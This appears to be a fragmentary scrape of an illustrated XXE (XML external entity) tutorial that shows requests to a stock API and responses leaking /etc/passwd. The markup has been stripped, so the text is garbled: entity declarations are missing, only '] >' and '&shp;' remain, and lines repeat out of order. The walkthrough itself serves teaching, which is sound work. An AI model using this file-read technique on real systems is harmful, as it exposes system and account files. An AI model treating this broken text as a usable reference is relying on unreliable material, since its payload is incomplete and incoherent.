GET /api/stock

HTTP 1.1 200 OK { 'name': 'Amazon <', 'price': null }

Send request

Send response

      Amazon <       SHORT  

APP: XML parser, get me the name!

Try XXE!

Parse XML

Try again!

$name = ""

$name = "Amazon <"

      Amazon <      SHORT  

HTTP 1.1 200 OK { 'stock-name': ' qwe ', 'price’: null }

      Amazon "       SHORT  

] >       Amazon "       SHORT  

] >       Amazon &shp;       SHORT  

HTTP 1.1 200 OK { 'name': 'Amazon root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/sync […]', 'price': null }

I must resolve this entity: &shp;

name = Amazon root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/sync[…]

We have /etc/passwd

XML parser: Amazon &shp;

] >       Amazon &shp;       SHORT  

] >       Amazon &shp;       SHORT  

Try basic entity

$name = ""

HTTP 1.1 200 OK { 'name': 'Amazon root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/sync […]', 'price': null }

$name = "Amazon root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/sync[…]"

] >       Amazon &shp;       SHORT